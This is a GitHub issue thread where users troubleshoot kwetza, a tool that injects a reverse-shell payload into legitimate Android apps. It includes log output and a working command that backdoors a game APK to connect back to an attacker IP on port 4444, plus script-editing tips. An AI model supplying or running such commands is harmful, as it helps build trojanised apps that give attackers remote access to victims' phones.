Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

[+] NO LAUNCHER FOUND, PLEASE SPECIFY A TARGET CLASS #33

Open
las12xc opened this issue Feb 23, 2018 · 7 comments
Open

[+] NO LAUNCHER FOUND, PLEASE SPECIFY A TARGET CLASS #33

las12xc opened this issue Feb 23, 2018 · 7 comments

Comments

@las12xc
Copy link

las12xc commented Feb 23, 2018

                                       _                  _              ___    ___  
                                      | |                | |            |__ \  / _ \ 

_ __ ___ _ __ ___ _ __ ___ _ __ ___ | | ____ | | ______ _ ) || | | |
| '
_ \| '_ _ | '
_ \| '_ _ \ | |/ /\ \ /\ / / _ \ | / ` | / / | | | |
| | | | | | | | | | | | | | | | | | | | | | < \ V V / _/ | / / (
| | / /
| || |
|
| || ||| || ||| || ||| || || ||_\ _/_/ _
|_/_,| |()/

[] DECOMPILING TARGET APK
[+] ENDPOINT IP: 192.168.0.104
[+] ENDPOINT PORT: 4444
[+] APKTOOL DECOMPILED SUCCESS
[
] BYTING TCP COMMS
[*] ANALYZING ANDROID MANIFEST
[DEBUG] Attempting to find MAIN
[+] NO LAUNCHER FOUND, PLEASE SPECIFY A TARGET CLASS
please help me

@rickjr
Copy link

rickjr commented Sep 12, 2018

Open kwetza.py script, edit:
#NOW WE NEED TO DECOMPILE THE APPLICATION
command = ["apktool", "d", ""+cwd+"/"+sys.argv[1]]
p = subprocess.Popen(command, stdout=subprocess.PIPE)
result = p.communicate()[0]
(remove option -f and -r parameters)

@Ahmedabdsalam
Copy link

!!! ERROR IN 'injectCrazyPermissions' method
list index out of range
@rickjr I did as you said!

@WinMore
Copy link

WinMore commented Oct 26, 2018

add AssistActivity after yes or no
sample: python kwetza.py PokemonDuel.apk tcp 192.168.10.6 4444 yes AssistActivity

@Palmus84
Copy link

add AssistActivity after yes or no
sample: python kwetza.py PokemonDuel.apk tcp 192.168.10.6 4444 yes AssistActivity

It works!

@kshitijguptaa
Copy link

[] DECOMPILING TARGET APK
[+] ENDPOINT IP: 192.168.0.104
[+] ENDPOINT PORT: 4444
Destination directory (/root/Desktop/kwetza-master/RandomChat) already exists. Use -f switch if you want to overwrite it.
[+] APKTOOL DECOMPILED SUCCESS
[
] BYTING HTTPS COMMS
[] ANALYZING ANDROID MANIFEST
[
] USING CUSTOM ACTIVITY: AssistActivity
[*] PREPARING PAYLOADS
!!! ERROR IN 'readPayloads' method
[Errno 2] No such file or directory: '/root/Desktop/kwetza-master/RandomChat/smali/AssistActivity.smali'
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

NOT WORKING AT ALL ANY OTHER ALTERNATIVE???

@palashtaru1984
Copy link

Open kwetza.py script, edit:
#NOW WE NEED TO DECOMPILE THE APPLICATION
command = ["apktool", "d", ""+cwd+"/"+sys.argv[1]]
p = subprocess.Popen(command, stdout=subprocess.PIPE)
result = p.communicate()[0]
(remove option -f and -r parameters)

i already did it but still not working

@MAHDI1251
Copy link

root@kali:/Desktop/kwetza# python kwetza.py install
File "/root/Desktop/kwetza/kwetza.py", line 17
print "BYTING TCP COMMS"
^
SyntaxError: Missing parentheses in call to 'print'. Did you mean print("BYTING TCP COMMS")?
root@kali:
/Desktop/kwetza#

i have problem have can i fix?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

9 participants